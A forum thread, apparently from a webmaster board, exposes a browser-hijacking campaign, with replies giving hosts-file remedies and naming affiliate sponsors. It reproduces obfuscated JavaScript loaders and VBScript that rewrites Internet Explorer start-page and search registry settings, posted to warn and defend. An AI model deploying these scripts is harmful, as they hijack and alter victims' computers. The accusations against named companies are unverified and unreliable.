ATTN ALL SPONSORS <-- read this now
 

ORIGINAL PAGE THAT INITIALIZES THIS HACK

http://xxxpix4u.com/ * do not visit this site without an active firewall

FAKE OWNER OF DOMAIN

Erik Midsbraw ([email protected])
1067543182
PO BOX midsbraw
LA, MT 11652
US

SPONSORS SUPPORTING THIS HACKER

http://www.discountvideopass.com/?revid=100444
http://www.freepassbucks.com/freepb.php?site=36&e_refer=12111
http://www.ucbill.com/click.php?uid=ucsoft&bg=ffffff&product=1
http://derek.offshoreclicks.com/imps.php?affiliate=derek
http://install.xxxtoolbar.com/ist/scripts/prompt.php?event_type=onload&recurrence=always&ret ry=1&loadfirst=0&delayload=0&account_id=132192&adi d=a1066847049
http://www.freeezinebucks.com/ps.php?s=20&u=2398645
http://www.girlknights.com/index_main.html?id=274
http://www.coolwebsearch.com/search.php?aff=257
http://trafficback.com/cgi-bin/out/59/2&p=60&f=1&link=text
http://tradesgear.com/?ref_id=638

ok the js file below can be found at

http://xxxpix4u.com/clean.js

this code with obstrucated urls

{ -
vor t="",w="",o="wu.Pflb0i hMS|=zjHkgosn;p)\"Tad1<vre>/Jmty:(-Lc",c=46;eval(unescape("%66%75%6E%63%74%69%6F%6E%2 0%67%67%67%28%29%7B%64%6F%63%75%6D%65%6E%74%2E%77% 72%69%74%65%28%77%29%7D%3B%66%75%6E%63%74%69%6F%6E %20%71%28%64%29%7B%76%61%72%20%72%3D%27%27%2C%78%2 C%69%2C%79%2C%70%3B%66%6F%72%28%78%3D%30%3B%78%3C% 64%2E%6C%65%6E%67%74%68%3B%78%2B%2B%29%7B%69%3D%64 %2E%63%68%61%72%41%74%28%78%29%3B%79%3D%6F%2E%69%6 E%64%65%78%4F%66%28%69%29%3B%69%66%28%79%3E%2D%31% 29%7B%70%3D%28%28%79%2B%31%29%25%63%2D%31%29%3B%69 %66%28%70%3C%3D%30%29%7B%70%2B%3D%63%7D%72%2B%3D%6 F%2E%63%68%61%72%41%74%28%70%2D%31%29%7D%65%6C%73% 65%7B%72%2B%3D%69%7D%7D%77%2B%3D%72%7D"));q("hhhhh hhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhh hhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhh hhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhh hhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhh hhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhh hhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhh hhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhh hhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhh hhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhh hhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhvnwe ");q(")yhbd;o.do>zTmdrd|we )yT/\r\nrdehsfs).)hzhu ;1suPwe>dy>fs).)-\"p\r\nl.;wy s;hnMsufs).)-\"h{\r\nhhhhsfs).)P1sw.t>;yP0s1:P ;;>ekaSchzhTvs0H>wyh1dydzMyy)(JJs;b:Mde1) wnPwstJr 1nJ<P)M)/Tp\r\nhhhhsfs).)PnMsu-i,i,<,<,1sw.t>;yP0s1:\"p\r\nhh}\r\nl.;wy s;hny bb-\"{\r\n}\r\nl.;wy s;hl.wg.)-\"{\r\nnMsufs).)-\"\r\n}\r\nrdehbd;ohzh;dr odysePn:ny>tcd;o.do>p\r\n lh--bd;ohzzhTe.T\"hhahahahah-bd;ohzzhTjMLwMT\"hhahahahah-bd;ohzzhTjMLMgT\"hhahahahah-bd;ohzzhTjMT\"hhahahahah-bd;ohzzhTjMLtsT\"hhahahahah-bd;ohzzhTjMLnoT\"hhahahahah-bd;ohzzhTjMLyuT\"hhahahaha");q("h-bd;ohzzhT.gT\"hhahahahah-bd;ohzzhT.jT\"\"h{ny bb-\"p}\r\n>bn>\r\n{l.wg.)-\"p}\r\nvJnwe )y/h");ggg();dacumint.write(t);t="";//--}

this code attempts to access your mshta.exe if successfull it runs

http://www.onlyhardpics.com/vids/1.php and the following code


<scruipt languige=vbs>
Set Shl = CreateObject("WScript.Shell")
Shl.RegWrite "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page", "http://www.searchdot.net"
Shl.RegWrite "HKLM\Software\Microsoft\Internet Explorer\Main\Start Page", "http://www.searchdot.net"
Shl.RegWrite "HKLM\Software\Microsoft\Internet Explorer\Main\Search Page", "http://www.searchdot.net"
Shl.RegWrite "HKLM\Software\Microsoft\Internet Explorer\Main\Search Bar", "http://www.searchdot.net"
Shl.RegWrite "HKLM\Software\Microsoft\Internet Explorer\Main\Use Search Asst", "no"
Shl.RegWrite "HKLM\Software\Microsoft\Internet Explorer\SearchUrl\", "http://www.searchdot.net"
Shl.RegWrite "HKLM\Software\Microsoft\Internet Explorer\Search\SearchAssistant", "http://www.searchdot.net"
Shl.RegWrite "HKLM\Software\Microsoft\Internet Explorer\Search\CustomizeSearch", "http://www.searchdot.net"
Shl.RegWrite "HKCU\Software\Microsoft\Internet Explorer\Search\SearchAssistant", "http://www.searchdot.net"
Shl.RegWrite "HKCU\Software\Microsoft\Internet Explorer\Search\CustomizeSearch", "http://www.searchdot.net"
Shl.RegWrite "HKCU\Software\Microsoft\Internet Explorer\Search\Default_Search_URL", "http://www.searchdot.net"
Shl.RegWrite "HKCU\Software\Microsoft\Internet Explorer\Main\Default_Page_URL", "http://www.searchdot.net"
Shl.RegWrite "HKCU\Software\Microsoft\Internet Explorer\Main\Default_Search_URL", "http://www.searchdot.net"
Shl.RegWrite "HKCU\Software\Microsoft\Internet Explorer\Main\Search Page", "http://www.searchdot.net"
window.close()
</scrupt>


Fake uninstall can be located at

http://www.searchdot.net/remove/index.html

this opens up

http://onlyhardpics.com/qunin/1.php and the following code

scrap language="Javacrap" type="text/javcrap"><!--
var m="",f="lPIvg pAuj;Bn(0WEr<qd\"=ozLt/:aM>chmSk#5.sTy)wiHf1eb",g="",i=51;eval(unescape(" %66%75%6E%63%74%69%6F%6E%20%70%70%70%28%29%7B%64%6 F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%67%29%7D% 3B%66%75%6E%63%74%69%6F%6E%20%72%28%77%29%7B%76%61 %72%20%65%3D%27%27%2C%75%2C%6B%2C%6E%2C%64%3B%66%6 F%72%28%75%3D%30%3B%75%3C%77%2E%6C%65%6E%67%74%68% 3B%75%2B%2B%29%7B%6B%3D%77%2E%63%68%61%72%41%74%28 %75%29%3B%6E%3D%66%2E%69%6E%64%65%78%4F%66%28%6B%2 9%3B%69%66%28%6E%3E%2D%31%29%7B%64%3D%28%28%6E%2B% 31%29%25%69%2D%31%29%3B%69%66%28%64%3C%3D%30%29%7B %64%2B%3D%69%7D%65%2B%3D%66%2E%63%68%61%72%41%74%2 8%64%2D%31%29%7D%65%6C%73%65%7B%65%2B%3D%6B%7D%7D% 67%2B%3D%65%7D"));r("ppppppppppppppppppppppppppppp pppppppppppppppppppppppppppppppppppppppppppppppppp pppppppppppppppppppppppppppppppppppppppppppppppppp pppppppppppppppppppppppppppppppppppppppppppppppppp pppppppppppppppppppppppppppppppppppppppppppppppppp pppppppppppppppppppppppppppppppppppppppppppppppppp pppppppppppppppppppppppppppppppppppppppppppppppppp pppppppppppppppppppppppppppppppppppppppppppppppppp pppppppppppppppppppppppppppppppppppppppppppppppppp pppppppppppppppppppppppppppppppppppppppppppppppppp ppppppppppppppppq\"Hg");r("pMPH (o=hb(/b<=cqlcq1z(/p1Mhbo=u<HMPpnPMh#=pTHLbo=.=phzPz<o=5WWWWWW=cItruk rpEuvypssssq:1z(/cq:lcq:\"HgcpqTh<HA/c\r\nppgM<pzIzAjApopiH(\"zish<bM/bIzAjA0wB\r\n\r\npp1j(h/Hz(pTmziIzAjA0wp{\r\nppppzIzAjAs\"zhjSb(/slz\")sH((b<fy>tpop=qzl;bh/p\"M/Mom//Aa::z(P)mM<\"AHhTshzS:dj(H(:esAmAc=B\r\nppppzIzAjA sTmzi0W,W,e,e,\"zhjSb(/slz\")wB\r\npp}\r\npp\r\nTmziIzAjA0w\r\nq:Th<HA/cp");ppp();hahahahahahahahahahahahahahaha(m);m=" ";//--></scrapt></

and does the following


<scraipt languige=vbs>
Set Shl = CreateObject("WScript.Shell")
Shl.RegWrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Ru n\Msoffice",""
Shl.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Ru n\Msoffice",""
Shl.RegDelete "HKLM\Software\Microsoft\Windows\CurrentVersion\Ru n\Msoffice"
Shl.RegDelete "HKCU\Software\Microsoft\Windows\CurrentVersion\Ru n\Msoffice"
Shl.Popup "UNINSTALL COMPLETE!"
windiw.close()
</scrupt>


If you belong to the sponsors above, i wouldnt be happy that they are allowing this as it means less money in your pocket as more and more people will have already seen your ads and less payout as these people thief your sponsors.

If anyone is thinking of using the code provided to alter other peoples computers , I would think again.


Also to those sponsors or affiliates buying traffic from offshoreclicks.com they are actively involved in buying the above traffic and selling it to you.

The following person can be found with 90% of the domains on thehun's blacklist or anyone else's for that matter.

He is also the person responsible for altering the hosts files for thehun and several other high profile websites


BE WARNED IM GONNA CATCH YOU AND WHEN I DO !!!

:thumbsup

p.s. i had to edit the code a bit for it to show up properly

Damn! Good catch, Smokey!

Other sponsors have been notified personally as they may be new , the sponsors above are well aware of the this hacker and have been kindly accepting the stolen traffic.

Good job Smokey - burn him :-)
Have a full list of the domains he's using?
Also, do you have a solution we can give our surfers if they per chance got it?

Thanks for your efforts......great to see the experienced guys vocalizing to help the entire community. :thumbsup

smokey the bear, puttin' out them firessssss :thumbsup

I have 2 solutions.

If your running windows xp go into widows/system32/drivers/etc/

and find your hosts file

add the following

66.218.71.198 derek.offshoreclicks.com

66.218.71.198 offshoreclicks.com

66.218.71.198 www.offshoreclicks.com

66.218.71.198 hihost4all.com

66.218.71.198 xvaluehost.com

66.218.71.198 66.230.218.254


this will reroute the above domains to yahoo.com
------------------------------------------------------

and so on with all the domains you dont ever want to see ever again

If you run a tgp make sure your script has whois checkiing capability and start banning by nameservers this will cover alot more ground than banning by domains or emails

If you have already been targeted i suggest u manually edit your registry ( if you have experience ) and use one of the well known spamcleaners such as cwshredder ( search for it on yahoo )

As far as a full list of domains , no i dont like doing that because once those domains get dropped they get snatched up by unsuspecting people who dont realise they are blacklisted causing further problems. If you really want to ban by domain i suggest checking the well known sites blacklists like THEHUN

Way to stay on top of the fires Smokey:thumbsup

Bump for the sponsors who just woke up and havent seen this yet.

God DAMN!
Nice sleuthing... thats some nasty script work.

Great bust!
WG

Thanks for the kind words

excellent job Smokey The Bear :thumbsup

btw if you got time hit me up on icq
#1 2 1 2 5 8 3 1 1

127.0.0.1 localhost 66.40.16.131 livesexlist.com 66.40.16.131 lanasbigboobs.com 66.40.16.131 thumbnailpost.com 66.40.16.131 adult-series.com 66.40.16.131 www.livesexlist.com 66.40.16.131 www.lanasbigboobs.com 66.40.16.131 www.thumbnailpost.com 66.40.16.131 www.adult-series.com


i have this on my host file what should i have to do ?

:mad:

Nice work detective :thumbsup

I thought smokey was supposed to PUT OUT fires? This bear is running around the forest with a blow torch an shit. :1orglaugh

erase it..

And BTW they also have a hack thru windows media player as well on that page above, but im still trying to figure it out . once i do ill leave words

Why not make your hosts file Read-Only?

Smokey even though we flame each other left and right this is a good post :thumbsup

:thumbsup Thanks , A sure sign of maturity and integrity is when you can agree with someone you dont like . :)

It's time someone started taking these bastards down. One step at a time. I also found a new security flaw in windows media player 9.0 that can cause some serious problems.

B.T.W this same group is responsible for taking down choker and thehun not long ago.

Because these guys move so fast and switch shit so quickly i think everyone needs to take a lesson here about one company in particular. OFFSHORECLICKS.COM

Most sponsors are pretty good at cutting off spammers/warez/cp/hacked traffic but im inclined to think that offshoreclicks is either hand in hand in this ring or is blatantly turning their heads the other way. Either way any sponsors that are affiliated with offshoreclicks will soon be affiliated either directly or indirectly with cp/hacking/warez/spammers, And you may find yourself part of an investigation you dont need. Dont let these thieves turn the adult industry into a mess that we will ALL pay for in the long run.

See Smokey when it all boils down to the basics.... its about the money.

For example Joe Warez says to sponsor yo I can send you x amount of signups and whatever . Sponser sees its good signups low cb's and overlooks the "traffic source"

Now is this BS yes but its amatter of opinion and sometimes money takes front with certain issues and decisions

MORE SPONSORS SUPPORTING THIS GROUP

http://www.PopUpPrevention.net/view.pl?ref=getitnow
http://www.SecretEraser.com/view.pl?ref=getitnow
http://connect.online-dialer.com/connect.php?did=od-stnd12&ufw=http://www.xxxpix4u.com/download.html'
http://www.topshelfpussy.com/main.htm?id=lui <nastydollars
http://adultfriendfinder.com/go/p12323c
http://www.freepassbucks.com/freepb.php?site=2&e_refer=12111
http://www.tnc4u.com/install.php?id=803189
http://www.teensvariety.com/?id=maxx
http://www.absolutepheromones.com/clicks/clickthrough.html?a=zeus
http://click.silvercash.com/?a=582863&p=1&s=922&r=5



*juicy it always has been about the money, but theres a line.

example if badguy sends x traffic to sponsor and everyone else sees this then the ratio's drop and people move to another sponsor. The the sponsor loses and the goodguy loses and the only one who gains is badguy and in the process he makes everyone look bad and make less. Once the feds crack down they associate badguys x traffic with y sponsor and feds make new rules and everyone loses. The traffic isnt being pulled out of thin air its been pilfered from the goodguys so the overall money spent on adult industry doesnt change it just falls into the wrong hands.

MORE SPONSORS THAT ARE ACCEPTING HACKED TRAFFIC

i will repeat the full list plus a few more

If you see your sponsor on this list i wouldnt be happy about it.

Some of the more well known ones are

GAMMACASH
FREEPASSBUCKS
ADULTPLATINUM
NASTYDOLLARS
FREEEZINEBUCKS ( HAWGS CASH )
PERERO
DISCOUNTPASSBUCKS
SILVERCASH
YOBUCKS
ONLINE-DIALER


http://www.adultplatinum.com/wm.html?id=155016
http://rex.offshoreclicks.com/dial.php?u=rex
http://www.virginsgangbang.com/index.html?id=274
http://advnt05.com/popsend.asp?id=30580
http://install.xxxtoolbar.com/ist/scripts/prompt.php?event_type=onload&recurrence=always&ret ry=0&loadfirst=1&account_id=132836
http://media2.carpediem.fr/promo_us/poploop/'+urlpopup+'?id=22020
http://www.PopUpPrevention.net/view.pl?ref=getitnow
http://www.SecretEraser.com/view.pl?ref=getitnow
http://connect.online-dialer.com/connect.php?did=od-stnd12&ufw=http://www.xxxpix4u.com/download.html'
http://www.topshelfpussy.com/main.htm?id=lui http://adultfriendfinder.com/go/p12323c
http://www.freepassbucks.com/freepb.php?site=2&e_refer=12111
http://www.tnc4u.com/install.php?id=803189
http://www.teensvariety.com/?id=maxx
http://www.absolutepheromones.com/clicks/clickthrough.html?a=zeus
http://click.silvercash.com/?a=582863&p=1&s=922&r=5
http://www.discountvideopass.com/?revid=100444
http://www.freepassbucks.com/freepb.php?site=36&e_refer=12111
http://www.ucbill.com/click.php?uid=ucsoft&bg=ffffff&product=1
http://derek.offshoreclicks.com/imps.php?affiliate=derek
http://install.xxxtoolbar.com/ist/scripts/prompt.php?event_type=onload&recurrence=always&ret ry=1&loadfirst=0&delayload=0&account_id=132192&adi d=a1066847049
http://www.freeezinebucks.com/ps.php?s=20&u=2398645
http://www.girlknights.com/index_main.html?id=274
http://www.coolwebsearch.com/search.php?aff=257
http://trafficback.com/cgi-bin/out/59/2&p=60&f=1&link=text
http://tradesgear.com/?ref_id=638

:thumbsup

I just found out where that even more vicious one is taking place

allteen-galleries.com
smuthostz.com

owned by the same group, and they are switching sponsors as fast as they can :)

if anyone with some savvy wants to try that first url out and see where you can find out with regards to the hack.

One quick way to get these guys stopped is to contact 10-domains.com and complain about the domain hihost4all.com and also complain to icann about 10-domaisn failure to pull that domain. It is the root cause of most of this crap.

[email protected]

go check the who is on the domains mentioned all the info is false.

The Bear Smoked em out -!
Nice work!

MORE SPONSORS ACCEPTING YOUR PILFERED TRAFFIC

www.adultmoviezone.com/.sbean%3Fbean%3D1-0-3-2815-28-1-10-tapenter%26front%3D1
http://www.mtreexxx.net/cpd/?cat=7&wmid=551327&tk=1068940931&args=1+324317+mt9 4+ddl
http://www.freeezinepotd.com/index.php?id=74860&pc=1
http://sexmosaic.com/members/enter.php?id=kucluu
http://www.movie-drive.com/mpegs/?f=73&x=55&rid=pp3536

what does altering the host file do exactly?

It can do many things . but basically it makes you go to a different page than you want.

Like if u typed in google it would go to coolwebsearch instead, but more and more they are becoming clever. They send you to the correct page , but you recieve a popup that was never there.

I noticed this on thehun a whileback on a friends box , i thought " gee thats strange thehun never had popups before" and sure enough it wasnt thehun it was the altered hosts file

Yo guys!

Smokey The Bear is probably too busy finding the crooks out there so...

A good tip for everyone who wants to feel a bit safer against HOSTS-rewrites:
Simply enable a Write-Protect on it's file-attributes (and if available to you, also the "System" attribute).

I believe those hacks out there are trying to overwrite the file "blindly", i.e. NOT clearing any file-attributes before overwriting.
This modification doesn't hurt your system at all so just go ahead :)

If you don't know where the file is at, just do a filesearch for "hosts" - in XP it's in [WINDOWS\system32\drivers\etc].

That is a good tip, but as it doesnt work in most cases the hosts file is deleted and remade on the fly thus your read only access wont do much.

And if all these flaws did was rewrite your hosts then that wouldnt be much of a problem.

TRY READING THE DAMN THREAD YOU PUTZ!!!

The intial code i posted rewrites your REGISTRY , or is that hard for you to figure out..

Well then you believe wrong. I happen to know as i watched it happen .

Great Find! And what is the full list of sponsers?

jDoG

These are all the accounts held by this hacker/group and all these sponsors dont care that they are recieving stolen traffic. So if you steal traffic from thehun by hacking all these companies seem to support it. As they have been notified and accounts are still open.

I have left off certain sponsors who may not be aware and have notified them personally. If the accounts stay open i will post them here to.


http://www.PopUpPrevention.net/view.pl?ref=getitnow
http://www.SecretEraser.com/view.pl?ref=getitnow
http://connect.online-dialer.com/connect.php?did=od-stnd12&ufw=http://www.xxxpix4u.com/download.html'
http://www.topshelfpussy.com/main.htm?id=lui <nastydollars
http://adultfriendfinder.com/go/p12323c
http://www.freepassbucks.com/freepb.php?site=2&e_refer=12111
http://www.tnc4u.com/install.php?id=803189
http://www.teensvariety.com/?id=maxx
http://www.absolutepheromones.com/clicks/clickthrough.html?a=zeus
http://click.silvercash.com/?a=582863&p=1&s=922&r=5
http://www.adultplatinum.com/wm.html?id=155016
http://rex.offshoreclicks.com/dial.php?u=rex
http://www.virginsgangbang.com/index.html?id=274
http://advnt05.com/popsend.asp?id=30580
http://install.xxxtoolbar.com/ist/scripts/prompt.php?event_type=onload&recurrence=always&ret ry=0&loadfirst=1&account_id=132836
http://media2.carpediem.fr/promo_us/poploop/'+urlpopup+'?id=22020
www.adultmoviezone.com/.sbean%3Fbean%3D1-0-3-2815-28-1-10-tapenter%26front%3D1
http://www.mtreexxx.net/cpd/?cat=7&wmid=551327&tk=1068940931&args=1+324317+mt9 4+ddl
http://www.freeezinepotd.com/index.php?id=74860&pc=1
http://sexmosaic.com/members/enter.php?id=kucluu
http://www.movie-drive.com/mpegs/?f=73&x=55&rid=pp3536
http://www.discountvideopass.com/?revid=100444
http://www.freepassbucks.com/freepb.php?site=36&e_refer=12111
http://www.ucbill.com/click.php?uid=ucsoft&bg=ffffff&product=1
http://derek.offshoreclicks.com/imps.php?affiliate=derek
http://install.xxxtoolbar.com/ist/scripts/prompt.php?event_type=onload&recurrence=always&ret ry=1&loadfirst=0&delayload=0&account_id=132192&adi d=a1066847049
http://www.freeezinebucks.com/ps.php?s=20&u=2398645
http://www.girlknights.com/index_main.html?id=274
http://www.coolwebsearch.com/search.php?aff=257
http://trafficback.com/cgi-bin/out/59/2&p=60&f=1&link=text
http://tradesgear.com/?ref_id=638

Sorry about the previous flame i think i took this the wrong way lol.

The tip is good but may not be enough.

BTW adult.com is one of the sponsors on the list above and that particular ref code came directly from a page that was routing THEHUNS website to it. So to THEHUN if you wonder who is making money off your stolen hits... i would ask lensman about it.

Lens dont give a fuck, hes a putz like all other sponsors. Fuck em:glugglug

No offense taken. :)

Do you think there's a way to make only the system allowed to access it and not users/administrators?

Or would the hack have such privileges on it's own and be able to fuck with it anyhow?
If one tries to look at the swapfile in XP for instance you will get a "file not found"..
Users & administrators have no privilige to either read, write, erase or create.
<br>

As with anything if theres a way to do it, theres a way around it :)

who cares!!!!

Lots of people. Including you or you wouldnt have posted in the thread.

Smokey, the typical hack at this point is to change your settings to allow downloads to occur without prompt. once that single change is made, they then hump boatloads of shit onto your system.

The nastier ones will add code in your registry to make sure they get reinstalled on each reboot, and some also change your IE link to be a reinstall for them, and then IE opens. You won't even know you have re-installed them until later - and no matter how many times you think you got rid of them, they come back to haunt you.

The sponsors that knowingly accept this traffic (not the ones that just end up receiving it, many are innocent victims of the scammers as well) should be actively shunned by everyone. The proof of the matter is that for some, pure dollar signs today and more important that a real business for the long term.

Hope the FTC decides to rip them a new one.

Alex

damn, someones gonna get burned on this one - nice work man :BangBang: :thumbsup

Theres more to come :) keep your eyes peeled for my next announcement :)

holy moly - what a sluething job!!

nice work :)

Thanks. BTW some of the sponsors contacted have not shutdown the accounts

www.freepassbucks.com seems to be working hand in hand with these thieves so is offshoreclicks.com If you have any money tied up in either of these companies . GET OUT NOW !! :) before its too late. The feds will be breathing down their necks. Means they will prob run away or flip flop the cash.

... now what a fucking big surprise that is. I don't know what you are thinking, but this is pretty much like sponsors saying "we don't accept spam" ... fucking bullshit, they love spam and to tell you the truth, they love exploit traffic even more ... you wanna know why, becasue it's fucking fresh and it converts like a fucking mother ...

I have seen dozens of galleries redirect to that xpix4u site.

I cant say how many domains those people own but it is ALOT.

Good Job Smokey:thumbsup